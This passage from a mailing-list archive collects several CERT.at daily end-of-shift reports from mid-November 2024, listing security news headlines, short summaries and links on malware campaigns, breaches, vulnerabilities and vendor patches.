(PAN-SA-2024-0015) (Severity: CRITICAL) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-0012 ∗∗∗ CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-9474 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 15.11.2024
by Daily end-of-shift report 15 Nov '24

15 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 14-11-2024 18:00 − Freitag 15-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Diese dummen Passwörter werden am häufigsten verwendet ∗∗∗ --------------------------------------------- Sind eure Accounts gut geschützt? Werft zur Sicherheit einen Blick auf diese Liste - hoffentlich fühlt ihr euch nicht ertappt. --------------------------------------------- https://futurezone.at/digital-life/dumme-passwoerter-oesterreich-internatio… ∗∗∗ Cyberangriff auf Destatis: Hacker erbeuten Firmendaten des Statistischen Bundesamtes ∗∗∗ --------------------------------------------- Der 3,8 GBytes große Datensatz bietet Zugriff auf von Unternehmen gemeldete Informationen. Das attackierte System wurde erst kürzlich modernisiert. --------------------------------------------- https://www.golem.de/news/cyberangriff-auf-destatis-hacker-erbeuten-firmend… ∗∗∗ MacOS 15.1: Apple patcht Drittanbieter-Firewalls kaputt ∗∗∗ --------------------------------------------- Wer unter MacOS 15.1 Drittanbieter-Firewalls wie Little Snitch verwendet, könnte auf Probleme stoßen. Filterregeln bleiben je nach Konfiguration wirkungslos. --------------------------------------------- https://www.golem.de/news/macos-15-1-apple-patcht-drittanbieter-firewalls-k… ∗∗∗ New Glove Stealer Malware Bypasses Google Chrome’s App-Bound to Steal Data ∗∗∗ --------------------------------------------- The New Glove Stealer malware has the ability to bypass Google Chrome’s Application-Bound (App-Bound) encryption to steal browser cookies. The threat actors’ attacks employed social engineering techniques akin to .. --------------------------------------------- https://heimdalsecurity.com/blog/glove-stealer-malware/ ∗∗∗ Gegen Enkeltrickbetrug: KI-Omi soll Kriminelle in endlose Gespräche verwickeln ∗∗∗ --------------------------------------------- Eine KI-generierte Omi soll für O2 Kriminelle beschäftigen, die echten Menschen per Telefon das Geld aus Tasche ziehen wollen. Dazu soll sie reden und reden. --------------------------------------------- https://www.heise.de/news/Gegen-Enkeltrickbetrug-KI-Omi-soll-Kriminelle-in-… ∗∗∗ Wordpress-Plug-in Really Simple Security gefährdet 4 Millionen Websites ∗∗∗ --------------------------------------------- Rund vier Millionen Wordpress-Seiten nutzen das Plug-in Really Simple Security. Angreifer aus dem Netz können sie kompromittieren. --------------------------------------------- https://www.heise.de/news/Wordpress-Plug-in-Really-Simple-Security-gefaehrd… ∗∗∗ An Interview With the Target & Home Depot Hacker ∗∗∗ --------------------------------------------- In December 2023, KrebsOnSecurity revealed the real-life identity of Rescator, the nickname used by a Russian cybercriminal who sold more than 100 million payment cards stolen from Target and Home Depot between 2013 and 2014. Moscow resident Mikhail Shefel, who confirmed using the Rescator identity in a recent interview, also admitted reaching out because he is broke and .. --------------------------------------------- https://krebsonsecurity.com/2024/11/an-interview-with-the-target-home-depot… ∗∗∗ Fake North Korean IT Worker Linked to BeaverTail Video Conference App Phishing Attack ∗∗∗ --------------------------------------------- North Korean IT worker cluster CL-STA-0237 instigated phishing attacks via video apps in Laos, exploiting U.S. IT firms and major tech identities. --------------------------------------------- https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cl… ∗∗∗ Kritische Sicherheitslücke in Laravel Framework - Updates verfügbar ∗∗∗ --------------------------------------------- Im Laravel Framework wurde eine kritische Sicherheitslücke entdeckt. Die Schwachstelle ermöglicht es Angreifern, durch manipulierte URLs unbefugten Zugriff auf Anwendungen zu erlangen und Umgebungsvariablen zu manipulieren. --------------------------------------------- https://www.cert.at/de/warnungen/2024/11/kritische-sicherheitslucke-in-lara… ∗∗∗ Safeguarding Healthcare Organizations from IoMT Risks ∗∗∗ --------------------------------------------- The healthcare industry has undergone significant transformation with the emergence of the Internet of Medical Things (IoMT) devices. These devices ranging from wearable monitors to network imaging systems collect and process vast .. --------------------------------------------- https://levelblue.com/blogs/security-essentials/safeguarding-healthcare-org… ∗∗∗ Zero-day exploitation targeting Palo Alto Networks firewall management interfaces ∗∗∗ --------------------------------------------- Palo Alto Networks has indicated they are observing threat activity exploiting a zero-day unauthenticated remote command execution vulnerability in their firewall management interfaces. --------------------------------------------- https://www.rapid7.com/blog/post/2024/11/15/etr-zero-day-exploitation-targe… ∗∗∗ Microsoft Power Pages Misconfigurations Expose Millions of Records Globally ∗∗∗ --------------------------------------------- SaaS Security firm AppOmni has identified misconfigurations in Microsoft Power Pages that can lead to severe data breaches. --------------------------------------------- https://hackread.com/microsoft-power-pages-misconfigurations-data-leak/ ∗∗∗ Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation ∗∗∗ --------------------------------------------- Written by: Matthijs Gielen, Jay ChristiansenBackgroundNew solutions, old problems. Artificial intelligence (AI) and large language models (LLMs) are here to signal a new day in the cybersecurity world, but what does that mean for us—the attackers and defenders—and our battle to improve security through all the noise?Data is everywhere. For most .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-… ∗∗∗ Defending Your Directory: An Expert Guide to Fortifying Active Directory Against LDAP Injection Threats ∗∗∗ --------------------------------------------- In our latest technical blog series, our DFIR team are highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and give experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ∗∗∗ Kubernetes Audit Log “Gotchas” ∗∗∗ --------------------------------------------- How to overcome challenges and security gaps when using K8s audit logs for forensics and attack detection. --------------------------------------------- https://www.wiz.io/blog/overcoming-kubernetes-audit-log-challenges ∗∗∗ Massive npm Malware Campaign Leverages Ethereum Smart Contracts To Evade Detection and Maintain Control ∗∗∗ --------------------------------------------- Supply chain attacks are evolving. The Socket research team has uncovered a massive malware campaign that uses Ethereum smart contracts to control its operations - making it nearly impossible to shut down through traditional means. Instead of using conventional command and control servers that can be blocked or taken offline, these attackers .. --------------------------------------------- https://socket.dev/blog/massive-npm-malware-campaign-leverages-ethereum-sma… ∗∗∗ PyPI Introduces Digital Attestations to Strengthen Python Package Security ∗∗∗ --------------------------------------------- The Python Package Index (PyPI) has announced support for digital attestations. This new feature allows package maintainers to publish signed digital attestations when uploading their projects, providing an additional layer of trust and verification for users.What Are Digital Attestations?Digital attestations are cryptographic statements or .. --------------------------------------------- https://socket.dev/blog/pypi-introduces-digital-attestations ∗∗∗ 60 Hours of Cyber Defense: Hong Kong’s Innovative Cybersecurity Drill Begins ∗∗∗ --------------------------------------------- Hong Kong has initiated its first-ever cybersecurity drill, set to run for a total of 60 hours. The Hong Kong cybersecurity drill commenced on Friday, with plans to establish it as an annual event moving forward. Innovation minister Sun Dong emphasized the importance of this initiative, stating that maintaining cybersecurity is essential for .. --------------------------------------------- https://thecyberexpress.com/hong-kong-cybersecurity-drill/ ===================== = Vulnerabilities = ===================== ∗∗∗ Critical Laravel Flaw (CVE-2024-52301) Exposes Millions of Web Applications to Attack ∗∗∗ --------------------------------------------- https://securityonline.info/critical-laravel-flaw-cve-2024-52301-exposes-mi… ∗∗∗ [webapps] SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) ∗∗∗ --------------------------------------------- https://www.exploit-db.com/exploits/52082 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.11.2024
by Daily end-of-shift report 14 Nov '24

14 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 13-11-2024 18:00 − Donnerstag 14-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 ∗∗∗ --------------------------------------------- While the FortiJump patch does effectively neutralise the devastating RCE that is FortiJump, we’re still a little concerned about FortiManager’s overall code quality. We note that our som/export vulnerability, ‘FortiJump Higher’, is still functional, even in patched versions, allowing adversaries to elevate from one managed FortiGate appliance to the central FortiManager appliance. --------------------------------------------- https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-2311… ∗∗∗ New PXA Stealer targets government and education sectors for sensitive information ∗∗∗ --------------------------------------------- Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia. --------------------------------------------- https://blog.talosintelligence.com/new-pxa-stealer/ ∗∗∗ Advertisers are pushing ad and pop-up blockers using old tricks ∗∗∗ --------------------------------------------- A malvertising campaign using an old school trick was found pushing to different ad blockers. [..] In the olden days, that something extra used to be video codecs or specific video players, but now we’ll be told we need a browser extension to “continue watching in safe mode.” [..] To us, this looks like a campaign executed by an affiliate, a company that promotes products or services from another company. If someone buys something through the affiliate’s efforts, the affiliate earns a commission. --------------------------------------------- https://www.malwarebytes.com/blog/news/2024/11/advertisers-are-pushing-ad-a… ∗∗∗ Сrimeware and financial cyberthreats in 2025 ∗∗∗ --------------------------------------------- Kasperskys GReAT looks back on the 2024 predictions about financial and crimeware threats, and explores potential cybercrime trends for 2025. --------------------------------------------- https://securelist.com/ksb-financial-and-crimeware-predictions-2025/114565/ ∗∗∗ Malware: Erkennung entgehen durch angeflanschtes ZIP ∗∗∗ --------------------------------------------- IT-Forscher haben Malware entdeckt, die der Erkennung durch Virenscanner durch Verkettung von ZIP-Dateien entgeht. --------------------------------------------- https://www.heise.de/-10034752 ∗∗∗ Gratis-Tool: Sicherheitsforscher knacken ShrinkLocker-Verschlüsselung ∗∗∗ --------------------------------------------- Der Erpressungstrojaner ShrinkLocker nutzt Microsofts Bitlocker, um Windows-Systeme zu verschlüsseln. Ein Entschlüsselungstool hilft. --------------------------------------------- https://www.heise.de/-10034933 ∗∗∗ PHP Reinfector and Backdoor Malware Target WordPress Sites ∗∗∗ --------------------------------------------- We recently observed a surge in WordPress websites being infected by a sophisticated PHP reinfector and backdoor malware. While we initially believed that the infection was linked to the wpcode plugin, we found that several sites without this plugin were compromised as well. Upon deeper investigation, we discovered that this malware not only reinfects website files but also embeds malicious code into other plugins and database tables wp_posts and wp_options. --------------------------------------------- https://blog.sucuri.net/2024/11/php-reinfector-and-backdoor-malware-target-… ∗∗∗ Malware Spotlight: A Deep-Dive Analysis of WezRat ∗∗∗ --------------------------------------------- Check Point Research (CPR) provides a comprehensive analysis of a custom modular infostealer, tracked as WezRat, after the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a joint Cybersecurity Advisory and attributed the malware to the Iranian cyber group Emennet Pasargad. --------------------------------------------- https://research.checkpoint.com/2024/wezrat-malware-deep-dive/ ∗∗∗ Lazarus Group Targets macOS with RustyAttr Trojan in Fake Job PDFs ∗∗∗ --------------------------------------------- Group-IB has uncovered Lazarus group’s stealthy new trojan and technique of hiding malicious code in extended attributes on macOS. --------------------------------------------- https://hackread.com/lazarus-group-macos-rustyattr-trojan-fake-job-pdfs/ ===================== = Vulnerabilities = ===================== ∗∗∗ 4,000,000 WordPress Sites Using Really Simple Security Free and Pro Versions Affected by Critical Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- This is one of the more serious vulnerabilities that we have reported on in our 12 year history as a security provider for WordPress. This vulnerability affects Really Simple Security, formerly known as Really Simple SSL, installed on over 4 million websites, and allows an attacker to remotely gain full administrative access to a site running the plugin. CVE-2024-10924, CVSS Score: 9.8 (Critical) --------------------------------------------- https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/ ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (llama-cpp, mingw-expat, python3.6, webkit2gtk4.0, and xorg-x11-server-Xwayland), Mageia (java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-21-openjdk & java-latest-openjdk and libarchive), Oracle (expat, gstreamer1-plugins-base, kernel, libsoup, podman, and tigervnc), SUSE (buildah, java-1_8_0-openjdk, and switchboard-plug-bluetooth), and Ubuntu (zlib). --------------------------------------------- https://lwn.net/Articles/998143/ ∗∗∗ CISA Releases Nineteen Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- Siemens, Rockwell, Hitachi, 2N, Elvaco, Baxter --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/11/14/cisa-releases-nineteen-i… ∗∗∗ GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7 ∗∗∗ --------------------------------------------- These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. [..] An issue was discovered in GitLab CE/EE affecting all versions starting from 16.0 prior to 17.3.7, starting from 17.4 prior to 17.4.4, and starting from 17.5 prior to 17.5.2, which could have allowed unauthorized access to the Kubernetes agent in a cluster under specific configurations. CVE-2024-9693, CVE-2024-7404, CVE-2024-8648, CVE-2024-8180, CVE-2024-10240 --------------------------------------------- https://thecyberthrone.in/2024/11/14/gitlab-fixes-high-severity-vulnerabili… ∗∗∗ Drupal: POST File - Critical - Cross Site Scripting, Arbitrary PHP code execution - SA-CONTRIB-2024-060 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-060 ∗∗∗ Drupal: POST File - Moderately critical - Cross Site Request Forgery - SA-CONTRIB-2024-059 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-059 ∗∗∗ Fortinet: Lack of capacity to filter logs by administrator access ∗∗∗ --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-23-267 ∗∗∗ Palo Alto: CVE-2024-2551 PAN-OS: Firewall Denial of Service (DoS) Using a Specially Crafted Packet (Severity: MEDIUM) ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/CVE-2024-2551 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.11.2024
by Daily end-of-shift report 13 Nov '24

13 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 12-11-2024 18:00 − Mittwoch 13-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Itsmydata: Hackerin veröffentlicht erneut Bonitätsdaten von Jens Spahn ∗∗∗ --------------------------------------------- Erst über Bonify, nun über Itsmydata: Lilith Wittmann hat sich mal wieder Bonitätsdaten von Jens Spahn beschafft. Immerhin hat sich sein Score verbessert. --------------------------------------------- https://www.golem.de/news/itsmydata-hackerin-veroeffentlicht-erneut-bonitae… ∗∗∗ Threats in space (or rather, on Earth): internet-exposed GNSS receivers ∗∗∗ --------------------------------------------- Internet-exposed GNSS receivers pose a significant threat to sensitive operations. Kaspersky shares statistics on internet-exposed receivers for July 2024 and advice on how to protect against GNSS attacks. --------------------------------------------- https://securelist.com/internet-exposed-gnss-receivers-in-2024/114548/ ∗∗∗ Chinas Volt Typhoon crew and its botnet surge back with a vengeance ∗∗∗ --------------------------------------------- Ohm, for flux sake Chinas Volt Typhoon crew and its botnet are back, compromising old Cisco routers once again to break into critical infrastructure networks and kick off cyberattacks, according to security researchers. --------------------------------------------- https://www.theregister.com/2024/11/13/china_volt_typhoon_back/ ∗∗∗ Stromanbieter Tibber gehackt, 50.000 deutsche Kunden betroffen ∗∗∗ --------------------------------------------- Tibber bestätigt, dass Hacker eingedrungen sind und Kundendaten an sich gebracht haben. Im Darknet werden diese nun verkauft. --------------------------------------------- https://www.heise.de/news/Stromanbieter-Tibber-gehackt-50-000-deutsche-Kund… ∗∗∗ Sicherheitsupdates: Zoom Room Client & Co. angreifbar ∗∗∗ --------------------------------------------- Die Entwickler rüsten verschiedene Zoom-Apps gegen mögliche Angriffe. Davon sind unter anderem macOS und Windows betroffen. --------------------------------------------- https://www.heise.de/news/Sicherheitsupdates-Zoom-Room-Client-Co-angreifbar… ∗∗∗ Global Companies Are Unknowingly Paying North Koreans: Here’s How to Catch Them ∗∗∗ --------------------------------------------- We discuss North Koreas use of IT workers to infiltrate companies, detailing detection strategies like IT asset management and IP analysis to counter this. --------------------------------------------- https://unit42.paloaltonetworks.com/north-korean-it-workers/ ∗∗∗ The November 2024 Security Update Review ∗∗∗ --------------------------------------------- It’s not quite the holiday season, despite what some early decorators will have you believe. It is the second Tuesday of the month, and that means Adobe and Microsoft have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts.If you’d rather watch the .. --------------------------------------------- https://www.thezdi.com/blog/2024/11/12/the-november-2024-security-update-re… ∗∗∗ How Italy became an unexpected spyware hub ∗∗∗ --------------------------------------------- Italy is home to six major spyware vendors and one supplier, with many smaller and harder-to-track enterprises emerging all the time, experts say. --------------------------------------------- https://therecord.media/how-italy-became-an-unexpected-spyware-hub ∗∗∗ Germany warns of potential cyber threats from Russia ahead of snap election ∗∗∗ --------------------------------------------- “We must be especially prepared against threats like hacker attacks, manipulation, and disinformation," German Interior Minister Nancy Faeser said. --------------------------------------------- https://therecord.media/germany-cyber-threats-russia-elections ∗∗∗ Silent Threat: Red Team Tool EDRSilencer Disrupting Endpoint Security Solutions ∗∗∗ --------------------------------------------- Trend Micros Threat Hunting Team has observed EDRSilencer, a red team tool that threat actors are attempting to abuse for its ability to block EDR traffic and conceal malicious activity. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpo… ∗∗∗ Bitdefender Finds New ShrinkLocker Ransomware, Releases Its Decryptor Tool ∗∗∗ --------------------------------------------- Bitdefender has released a free decryptor for ShrinkLocker ransomware, which exploits Windows BitLocker to encrypt .. --------------------------------------------- https://hackread.com/bitdefender-shrinklocker-ransomware-decryptor-tool/ ∗∗∗ Emerging Threats: Cybersecurity Forecast 2025 ∗∗∗ --------------------------------------------- Every November, we start sharing forward-looking insights on threats and other cybersecurity topics to help organizations and defenders prepare for the year ahead. The Cybersecurity Forecast 2025 report, available today, plays a big role in helping us accomplish this mission.This year’s report draws on insights directly from Google .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-fore… ∗∗∗ Defending Your Directory: An Expert Guide to Fortifying Active Directory Certificate Services (ADCS) Against Exploitation ∗∗∗ --------------------------------------------- In our latest technical blog series, our DFIR team are highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and give experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ∗∗∗ Making Sense of Kubernetes Initial Access Vectors Part 1 – Control Plane ∗∗∗ --------------------------------------------- Explore Kubernetes control plane access vectors, risks, and security strategies to prevent unauthorized access and protect your clusters from potential threats. --------------------------------------------- https://www.wiz.io/blog/making-sense-of-kubernetes-initial-access-vectors-p… ∗∗∗ Time Boxed Penetration Testing for Web Applications ∗∗∗ --------------------------------------------- This article defines time boxed penetration testing and explains how it’s approached from a methodological standpoint. By focusing on high-risk areas, client-specific priorities, and sampling, time boxed testing can deliver efficient assessments within a limited timeframe. --------------------------------------------- https://projectblack.io/blog/time-boxed-penetration-testing/ ∗∗∗ Killing Filecoin nodes ∗∗∗ --------------------------------------------- By Simone Monica In January, we identified and reported a vulnerability in the Lotus and Venus clients of the Filecoin network that allowed an attacker to remotely crash a node and trigger a denial of service. This issue is .. --------------------------------------------- https://blog.trailofbits.com/2024/11/13/killing-filecoin-nodes/ ∗∗∗ Fault Injection – Down the Rabbit Hole ∗∗∗ --------------------------------------------- This series of articles describes fault injection attack techniques in order to understand their real potential by testing their limits and applicability with limited hardware (available on the market at an acceptable cost). It explores possible ways of using an attack that, in my opinion, is greatly underestimated. --------------------------------------------- https://security.humanativaspa.it/fault-injection-down-the-rabbit-hole/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (expat), Fedora (chromium and golang-github-nvidia-container-toolkit), Mageia (curl, expat, mpg123, networkmanager-libreswan, openssl, php-tcpdf, qbittorrent, and x11-server, x11-server-xwayland, and tigervnc), Red Hat (kernel and libsoup), Slackware (mozilla), SUSE (firefox, kernel, python-PyPDF2, and xen), and Ubuntu (dotnet9, ghostscript, linux-aws, linux-oem-6.8, and pydantic). --------------------------------------------- https://lwn.net/Articles/998044/ ∗∗∗ ZDI-24-1472: Veeam Backup Enterprise Manager AuthorizeByVMwareSsoToken Improper Certificate Validation Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1472/ ∗∗∗ ZDI-24-1486: (0Day) G DATA Total Security Incorrect Permission Assignment Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1486/ ∗∗∗ Critical Security Vulnerabilities Discovered in MZ Automation’s MMS Client ∗∗∗ --------------------------------------------- https://encs.eu/news/critical-security-vulnerabilities-discovered-in-mz-aut… ∗∗∗ Online Installer DLL Hijacking ∗∗∗ --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-24-205 ∗∗∗ Fortinet Releases Security Updates for Multiple Products ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/11/12/fortinet-releases-securi… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.11.2024
by Daily end-of-shift report 12 Nov '24

12 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Montag 11-11-2024 18:00 − Dienstag 12-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Daten von Amazon-Mitarbeiter wurden in einem Hackerforum veröffentlicht ∗∗∗ --------------------------------------------- Der Datensatz dürfte von einem Immobilienverwalter stammen und auf die kritische Lücke in der Software von Moveit zurückgehen --------------------------------------------- https://www.derstandard.at/story/3000000244555/daten-von-amazon-mitarbeiter… ∗∗∗ ModeLeak: Privilege Escalation to LLM Model Exfiltration in Vertex AI ∗∗∗ --------------------------------------------- New research reveals two vulnerabilities in Googles Vertex AI that may lead to privilege escalation or data theft through custom jobs or malicious models. --------------------------------------------- https://unit42.paloaltonetworks.com/privilege-escalation-llm-model-exfil-ve… ∗∗∗ 2023 Top Routinely Exploited Vulnerabilities ∗∗∗ --------------------------------------------- This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise .. --------------------------------------------- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a ∗∗∗ Building a Resilient Network Architecture: Key Trends for 2025 ∗∗∗ --------------------------------------------- As organizations continue to align their operational strategies with evolving digital ecosystems and technologies, the concept of network resilience has become a priority. A major mindset shift is that modern networks must be designed not just for speed and efficiency but also for flexibility, security, and the ability to hold out against .. --------------------------------------------- https://levelblue.com/blogs/security-essentials/building-a-resilient-networ… ∗∗∗ LodaRAT: Established malware, new victim patterns ∗∗∗ --------------------------------------------- Rapid7 has observed an ongoing malware campaign involving a new version of LodaRAT. This version possesses the ability to steal cookies and passwords from Microsoft Edge and Brave. --------------------------------------------- https://www.rapid7.com/blog/post/2024/11/12/lodarat-established-malware-new… ∗∗∗ ICS Security Is a Team Sport ∗∗∗ --------------------------------------------- Brandon Smith discusses some of the challenges an Automation Engineer face, Bitsights partnership with Schneider Electric, and what manufacturers in general are doing to tackle ICS security. --------------------------------------------- https://www.bitsight.com/blog/ics-security-team-sport ∗∗∗ Visionaries Have Democratised Remote Network Access - Citrix Virtual Apps and Desktops (CVE Unknown) ∗∗∗ --------------------------------------------- Well, we’re back again, with yet another fresh-off-the-press bug chain (and associated Interactive Artifact Generator). This time, it’s in Citrix’s “Virtual Apps and Desktops” offering. --------------------------------------------- https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-n… ∗∗∗ SAP Patchday: Acht neue Sicherheitslücken, davon eine hochriskant ∗∗∗ --------------------------------------------- Admins können etwas entspannter auf den aktuellen SAP-Patchday schauen: Von acht neuen Sicherheitslücken gilt lediglich eine als hohes Risiko. --------------------------------------------- https://heise.de/-10020168 ∗∗∗ Attack of the Evil Baristas ∗∗∗ --------------------------------------------- I use the term “hacklore” to refer to the urban legends surrounding cybersecurity. Hacklore is everywhere, and this holiday season, you’re bound to hear it nonstop: “The Russians will load your phone with malware if you scan QR codes!” or “Hackers will steal your banking details if you use a USB charger at the airport!” and so on. --------------------------------------------- https://medium.com/@boblord/attack-of-the-evil-baristas-b204436f0853 ∗∗∗ Reverse Engineering: Finding Exploits in Video Games ∗∗∗ --------------------------------------------- In this guide, I'll walk you through how I create tools to find exploits in video games for bug bounty programs. Specifically, I'll focus on my research into the game Sword of Convallaria. This exploration is purely for educational purposes. As such, I have removed some of the assets as an exercise for .. --------------------------------------------- https://shalzuth.com/Blog/FindingExploitsInGames ∗∗∗ Critical WPLMS WordPress Theme Vulnerability Puts Websites at Risk of RCE Attacks ∗∗∗ --------------------------------------------- A newly discovered vulnerability in the WPLMS WordPress theme threatens websites with potential Remote Code Execution (RCE) due to a critical path traversal flaw. CVE-2024-10470, a vulnerability in the WPLMS .. --------------------------------------------- https://thecyberexpress.com/critical-wplms-wordpress-theme-vulnerability/ ∗∗∗ Harnessing Chisel for Covert Operations: Unpacking a Multi-Stage PowerShell Campaign ∗∗∗ --------------------------------------------- The Cyble Research and Intelligence Lab (CRIL) has recently uncovered a sophisticated multi-stage infection chain, primarily driven by PowerShell scripts. This campaign, which targets organizations through a variety of .. --------------------------------------------- https://thecyberexpress.com/new-powershell-campaign/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (gstreamer1-plugins-base), Debian (chromium, ghostscript, libarchive, mpg123, ruby-saml, and symfony), Fedora (buildah and podman), Red Hat (buildah, containernetworking-plugins, podman, skopeo, and xorg-x11-server-Xwayland), Slackware (wget), SUSE (pcp), and Ubuntu (linux, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-kvm, .. --------------------------------------------- https://lwn.net/Articles/997903/ ∗∗∗ Citrix Releases Security Updates for NetScaler and Citrix Session Recording ∗∗∗ --------------------------------------------- Citrix released security updates to address multiple vulnerabilities in NetScaler ADC, NetScaler Gateway, and Citrix Session Recording. A cyber threat actor could exploit some of these vulnerabilities to take control .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/11/12/citrix-releases-security… ∗∗∗ November Security Update ∗∗∗ --------------------------------------------- At Ivanti, our top priority is upholding our commitment to deliver and maintain secure products for our customers. Our vulnerability management program is designed to enable us to find, fix and disclose vulnerabilities in collaboration with the broader security ecosystem, and communicate responsibly and transparently with customers. Ivanti is .. --------------------------------------------- https://www.ivanti.com/blog/november-2024-security-update ∗∗∗ XSA-464 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-464.html ∗∗∗ XSA-463 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-463.html ∗∗∗ Mehrere Schwachstelen in Siemens Energy Omnivise T3000 ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/mehrere-schwachstelen… ∗∗∗ Zyxel security advisory for post-authentication command injection and buffer overflow vulnerabilities in GS1900 series switches ∗∗∗ --------------------------------------------- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.11.2024
by Daily end-of-shift report 11 Nov '24

11 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 08-11-2024 18:00 − Montag 11-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Palo Alto untersucht mögliche Sicherheitslücke in PAN-OS-Webinterface ∗∗∗ --------------------------------------------- Palo Alto untersucht eine angebliche Codeschmuggel-Lücke in der Verwaltungsoberfläche von PAN-OS. Ein Teil betroffener Kunden wird informiert. [..] Palo Alto empfiehlt Kunden dringend, sicherzustellen, dass der Zugang zur Verwaltungsoberfläche korrekt und im Einklang mit den empfohlenen Best-Practices-Richtlinien erfolgt. Dafür stellt das Unternehmen auch eine Anleitung bereit. --------------------------------------------- https://www.heise.de/-10013896.html ∗∗∗ Zugangsdaten aus 2023 für Zugriff ausgenutzt - "Helldown Leaks"-Ransomware kompromittiert Unternehmen über Zyxel-Firewalls ∗∗∗ --------------------------------------------- Seit etwa Anfang August 2024 werden international Unternehmen durch die Ransomware-Gruppe "Helldown Leaks" verschlüsselt. Als initialer Angriffsvektor können durchgängig Zyxel-Firewalls ausgemacht werden, selbst wenn diese auf dem letzten Software-Stand sind. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/11/zugangsdaten-aus-2023-fur-zugriff-… ∗∗∗ Testing the Koord2ool ∗∗∗ --------------------------------------------- As part of the EU-funded project “AWAKE”, we built the Koord2ool, which is a tool that allowed us to track the state of an incident across our constituency over time. We implemented this application as an extension to LimeSurvey (an Open Source survey tool) which generates a dashboard to visualize the state of the answers over time. --------------------------------------------- https://www.cert.at/en/blog/2024/11/testing-the-koord2ool ∗∗∗ Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware ∗∗∗ --------------------------------------------- Cybersecurity researchers 